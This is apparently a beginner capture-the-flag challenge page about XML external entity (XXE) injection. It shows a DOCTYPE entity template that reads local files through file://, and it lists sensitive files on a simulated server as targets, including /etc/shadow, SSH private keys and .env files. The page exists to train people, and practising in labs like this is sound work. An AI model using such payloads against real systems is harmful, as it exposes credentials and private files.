Basic XXE Challenge

Beginner 100 Points Basic XXE - File Read

Challenge Description

This application parses user-supplied XML data without properly disabling external entity processing. Your goal is to craft an XXE payload that reads local files from the server.

Objective: Use XXE injection to read the flag from the server's file system. The flag format is FLAG{...}

XML Parser

Submit XML to the vulnerable parser:

XML Input

Example Payloads

Server File System (for reference)

These files exist on the simulated server:

/etc/hostname

/etc/passwd

/etc/shadow

/flag.txt

/proc/self/environ

/root/.ssh/id_rsa

/var/log/auth.log

/var/www/app/.env

/var/www/app/config/database.yml

Submit Flag

Hints -10% per hint

Hints revealed: 0 / 5
Score penalty: 0%

XXE Syntax Reference

Basic structure:

<!DOCTYPE root [
  <!ENTITY name SYSTEM "file://path">
]>
<root>&name;</root>

Common protocols:

file:// - Read local files
http:// - Make HTTP requests
php:// - PHP wrappers (PHP only)

Learning Resources

PortSwigger XXE
OWASP XXE
HackTricks XXE